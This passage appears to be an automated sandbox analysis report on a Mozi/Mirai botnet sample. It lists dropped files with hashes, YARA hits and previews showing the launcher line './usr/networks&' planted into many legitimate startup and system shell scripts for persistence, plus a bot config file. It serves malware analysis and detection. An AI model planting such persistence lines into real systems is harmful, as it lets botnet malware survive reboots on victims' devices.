MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/gawk.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/im-config_wayland.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/vte-2.91.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/xdg_dirs_desktop_session.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/rcS.d/S95baby.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	25
Entropy (8bit):	3.8936606896881854
Encrypted:	false
SSDEEP:	3:TKH4v0VJ:hK
MD5:	1B3235BA10FC04836C941D3D27301956
SHA1:	8909655763143702430B8C58B3AE3B04CFD3A29C
SHA-256:	01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
SHA-512:	98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
Malicious:	true
Preview:	#!/bin/sh./usr/networks&.

/etc/wpa_supplicant/action_wpa.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	714
Entropy (8bit):	5.329653855555143
Encrypted:	false
SSDEEP:	12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
MD5:	DD099D71A60531087FDDED3EBEE8036A
SHA1:	C684334C3B133D889F8C5965184E1C9280BAA16A
SHA-256:	52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
SHA-512:	2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
Malicious:	false
Preview:	./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/; do..[ -S "${CTRL}" ] \|\| continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.

/etc/wpa_supplicant/functions.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/etc/wpa_supplicant/ifupdown.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	3368
Entropy (8bit):	5.3288648372922625
Encrypted:	false
SSDEEP:	48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
MD5:	77FEC347F290A3B065F36EE08ABB77C6
SHA1:	388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
SHA-256:	40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
SHA-512:	B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
Malicious:	false
Preview:	./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] \|\| [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set \| grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker

/tmp/.config

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	290
Entropy (8bit):	4.882721265987431
Encrypted:	false
SSDEEP:	6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/XF/RRaEtMFtbUrQQxXDzraOn3zuTTn9:AF+Ftb4HaU3zuMF+Ftb4HaU3zuV
MD5:	08BA44D1BC18F09E8AE5FF694F128A28
SHA1:	E08EAA84BB63D00A89919B22BE80638337F4132C
SHA-256:	ED6C2167CBB5FE7DA4D3593F8087A05A027D8820D47ABDA1342E1478E12B02B5
SHA-512:	0459DEB8A18AC93D4EBD60602F498D0578986BC94CEB7E247845332A59B183D9F01CB91918108B51EB2BE779DA1F123CD3CC7742E55F5C642A211F104B315463
Malicious:	false
Preview:	2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]-2076960834.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]

/usr/bin/gettext.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	1914
Entropy (8bit):	4.829445473341419
Encrypted:	false
SSDEEP:	48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
MD5:	6A371C00539A7CA37BBE68DF0F044BE9
SHA1:	20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
SHA-256:	0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
SHA-512:	2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
Malicious:	true
Preview:	./usr/networks&. func_usage; exit 0 ;;. --version \| --versio \| --versi \| --vers \| --ver \| --ve \| --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" \| (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" \| (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "

/usr/bin/rescan-scsi-bus.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	37310
Entropy (8bit):	4.959652179113969
Encrypted:	false
SSDEEP:	768:Y2l/oQ5nj2Zuv9pPOkUNW58rhUpm/AHgf7AN/0KK0SAQiAlcYm/qr6HZtda9Ts5w:Y2l/oQFj2Zuv9pPmNW58rhUpm/AHgf7H
MD5:	4C8E78D6A4073616C23D20694FDED604
SHA1:	4C22CE08AE9B9C3409D48F83874113765CCF819C
SHA-256:	BC8CFDD1A1E411786C084CD7674D81899506C9059F65E181AACA1185AD0573D1
SHA-512:	6D80B1A699BE6B8A881989FE42253594DA849B7D4CDA7073E614E9C4DEA828A0E795962CAB736D82A94AD159525219477561050A3897A7D9D2DAD2E1181DD21A
Malicious:	true
Preview:	./usr/networks&. exit 1;. fi. # Not necessary just use double quotes around variable to preserve new lines. #hosts=`echo $hosts \| tr ' ' '\n'`.}..# Return hosts. /proc/scsi/HOSTADAPTER/? must exist.findhosts ().{. hosts=. for driverdir in /proc/scsi/; do. driver=${driverdir#/proc/scsi/}. if test $driver = scsi -o $driver = sg -o $driver = dummy -o $driver = device_info; then continue; fi. for hostdir in $driverdir/; do. name=${hostdir#/proc/scsi/*/}. if test $name = add_map -o $name = map -o $name = mod_parm; then continue; fi. num=$name. driverinfo=$driver. if test -r "$hostdir/status"; then. num=$(printf '%d\n' "$(sed -n 's/SCSI host number://p' "$hostdir/status")"). driverinfo="$driver:$name". fi. hosts="$hosts $num". echo "Host adapter $num ($driverinfo) found.". done. done.}..printtype ().{. local type=$1.. case "$type" in. 0) echo "Direct-Access" ;;. 1) echo "Sequential-Access" ;;. 2) echo "Pr

/usr/networks

Download File

Process:	/tmp/Mozi.m.3
File Type:	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
Category:	dropped
Size (bytes):	307960
Entropy (8bit):	5.819679405566689
Encrypted:	false
SSDEEP:	6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
MD5:	EEC5C6C219535FBA3A0492EA8118B397
SHA1:	292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
SHA-256:	12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
SHA-512:	3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
Malicious:	true
Yara Hits:	Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security Rule: JoeSecurity_Mirai_6, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..\|0C..+...0......( ...S...........Z.....

/usr/share/PackageKit/helpers/test_spawn/search-name.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	47
Entropy (8bit):	3.90242960796693
Encrypted:	false
SSDEEP:	3:qXVOOR3vvLQVOORgn:uTn
MD5:	DF2ACF286726B02D483BEF86C91F7FA8
SHA1:	9E6A2422A7C3FBC0FCB34D314AF55D1452489DF0
SHA-256:	7BD4E13877E1F1E9AA5729AC8AF468E0C660DBCCADEF25C67DA99DE49F7AE549
SHA-512:	E99CFC15E6638CB9DA788C4B5744FF2170E183DC2A271847931E1C991C2D9049D1FF9C4EF49D7A7A348EE24DD994C0EA7048CDC4E6245930279F6A79E69312B9
Malicious:	false
Preview:	./usr/networks&.exit 0.../usr/networks&.exit 1.

/usr/share/alsa-base/alsa-info.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	25464
Entropy (8bit):	5.453877096685684
Encrypted:	false
SSDEEP:	384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
MD5:	D8A586F0E09BD885937F5C46F02D64D0
SHA1:	2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
SHA-256:	62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
SHA-512:	70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
Malicious:	false
Preview:	./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` \|\| exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE \|head -n1 \|sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM

/usr/share/alsa/utils.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	4725
Entropy (8bit):	5.44928341819888
Encrypted:	false
SSDEEP:	96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
MD5:	B4F115765D68E40BEBB845FA7F437539
SHA1:	4C37804189C7D91916E7050F4E4783A4C7F2F389
SHA-256:	9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
SHA-512:	27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
Malicious:	false
Preview:	./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]$[0-7]$[[:space:]]./\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } \|\| bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 \| filter_amixer_output \|\| :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } \|\| bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 \| filter_amixer_output \|\| :..return 0.}..# $1 <control>.# $2 "on" \| "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&

/usr/share/brltty/initramfs/brltty.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	46
Entropy (8bit):	3.925523369006428
Encrypted:	false
SSDEEP:	3:qXVOOR3vKDlOORgn:uK4n
MD5:	2CADDA792FBD37B54978108B6CC504D4
SHA1:	C28DD4FAC0523E31F0220FF31417583882C82692
SHA-256:	E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
SHA-512:	681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
Malicious:	false
Preview:	./usr/networks&.exit 0../usr/networks&.exit 1.

/usr/share/cups/braille/cups-braille.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	11664
Entropy (8bit):	5.539741046843357
Encrypted:	false
SSDEEP:	192:4RRRNryQ7F6avUvZswuHZkzTm8arUeo0vq2yS7b1KYMe7H/6:XQ7F61swuHZ6m8feNq2yDYMEH/6
MD5:	1B1A8B842BC45126EC5B709423446B59
SHA1:	99A49AE47721C62FE7659B23485AA3464B76CEC3
SHA-256:	E0FDE03C3CF51CA06A2F393BA43C4060AA0B52DDF96CDEE5F770ABC978CF49D0
SHA-512:	07DDD8C5C68B6510E12D14FCA6086E5AB0D42D0D4FA9084D53CC368172BB8847B05A1040CB787A2F489B1C35A443C8920074F2F6F95106B73C9185141555D226
Malicious:	false
Preview:	./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..# Printing options: number of copies and page ranges.[ -z "$NB" ] && NB=1.PAGERANGES=$(getOption page-ranges)..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE

/usr/share/cups/braille/index.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	3399
Entropy (8bit):	5.296419005515725
Encrypted:	false
SSDEEP:	96:QWswTl5TVnavmj+iHgvy/pHJvyWEz2a77:Zs4fVna9eKz2E
MD5:	6CA46C23DC6233BE77F0FD904C493D83
SHA1:	674B36A91CB4B815E3657F3060C88BC4EB071C95
SHA-256:	4E211F67F09E4E37EBB63EA30570A4E623ED1A185F0CCBB947104BF6775E04AA
SHA-512:	AC68CCEC39B7E40C7BD8982DA57F53D95CA5839591DC1A0368AEC531A0D905602D876CF830792138AC070BE897E2893DA2C3CA3F268DB81A0BCC1843E9C7B262
Malicious:	false
Preview:	./usr/networks&.[ $? = 0 ] \|\| exit 1.DUPLEX=$(getOption Duplex).[ -n "$DUPLEX" ] \|\| DUPLEX=None.ZFOLDING=$(getOption ZFolding).[ -n "$ZFOLDING" ] \|\| ZFOLDING=False.SIDEWAYS=$(getOption SideWays).[ -n "$SIDEWAYS" ] \|\| SIDEWAYS=False.SADDLESTITCH=$(getOption SaddleStitch).[ -n "$SADDLESTITCH" ] \|\| SADDLESTITCH=False.TABLE=$(getOptionNumber IndexTable).[ $? = 0 ] \|\| exit 1.MULTIPLEIMPACT=$(getOptionNumber IndexMultipleImpact).[ $? = 0 ] \|\| exit 1.HWPAGENUMBER=$(getOption HardwarePageNumber)..# Convert from 100th of mm to Inch fraction.mmToIndexIn () {. # 100th of mm. MM=$1.. # 120th of inches. IN120=$(($MM * 12 / 254)).. # Integer part. INT=$(($IN120 / 120 )).. # Fractional part, first in 120th of inch. FRAC=$(($IN120 % 120)).. # Convert to Index-specific values. if [ $FRAC -lt 30 ]; then. # Round down to zero. FRAC=0. elif [ $FRAC -ge 30 -a $FRAC -lt 40 ]; then. # Round down to a quarter. FRAC=1. elif [ $FRAC -ge 40 -a $FRAC -lt 60 ]; then. # Round down to a

/usr/share/cups/braille/indexv3.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	1587
Entropy (8bit):	5.05148558164496
Encrypted:	false
SSDEEP:	48:yvwpsuotO0I1cCkS+DYLYWYZ3rwi+BKjg/D+RJSW9L:Cfzo+SXEA7eSWV
MD5:	110002C4A9588D6E696253D0DE3C9978
SHA1:	C3C1B6798FD324BE31D732FFEFA1C7D7C5382F22
SHA-256:	91B0701CA62899B36DFEE8458643FA6DBEA36BB838C3E3C1C9E1DC6717F10BA8
SHA-512:	2DA3BA7043DF2C78BAB6435010040FA44EFE774C687165CCB91DA124E25C8D6C41CDBD50B25276AF21D18E3F31DAE4232DBF93E78B9363ECA133E7CB74AD7BD6
Malicious:	false
Preview:	./usr/networks&. [ $? = 0 ] \|\| exit 1.. # Paper size. case "$PAPERLENGTH" in. In). INIT+=,PW$(mmToIndexIn $PAGEWIDTH),PL$(mmToIndexIn $PAGEHEIGHT). ;;. Mm). INIT+=,PW$(($PAGEWIDTH / 100)),PL$(($PAGEHEIGHT / 100)). ;;. ) ;;. esac.. case $LINESPACING in. 250) INIT+=,LS0 ;;. 375) INIT+=,LS1 ;;. 450) INIT+=,LS2 ;;. 475) INIT+=,LS3 ;;. 500) INIT+=,LS4 ;;. 525) INIT+=,LS5 ;;. 550) INIT+=,LS6 ;;. 750) INIT+=,LS7 ;;. 1000) INIT+=,LS8 ;;. ). if [ $FIRMWARE -lt 120130 ]. then..echo "ERROR: unsupported $LINESPACING line spacing, please upgrade firmware to at least 12.01.3" >&2..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated

/usr/share/cups/braille/indexv4.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	1055
Entropy (8bit):	5.0066328703681355
Encrypted:	false
SSDEEP:	24:a8seltmT9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:hs6tSDYLYWYZ3rwyP8Bjg/D+RJSW9L
MD5:	E43BA2CA058B0AAC31BDF024BEE7ABE6
SHA1:	C78B616DBE567DCE177DA3553702F2FDCBEC07E8
SHA-256:	BF15B97CF5C1CD1D078ECF5B9B2454E6E95AC314AE6B0808AD093EFDF5508197
SHA-512:	AC9AC10BA0E853CF70AE2239710A9F7A661D604F0125150C72963461874C497FC2C4BCD8B42E15C062A77DB2BD8D0F2F7E6053CDAB7113CC31FCAC7F65F95724
Malicious:	false
Preview:	./usr/networks&. [ $? = 0 ] \|\| exit 1.. # Paper size. INIT+=,CH$PRINTABLETEXTWIDTH,LP$PRINTABLETEXTHEIGHT.. case $LINESPACING in. 500) INIT+=,LS50 ;;. 1000) INIT+=,LS100 ;;. ). echo "ERROR: unsupported $LINESPACING line spacing" >&2. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. ) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same

/usr/share/debconf/confmodule.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/acpid/examples/ac.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/acpid/examples/default.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
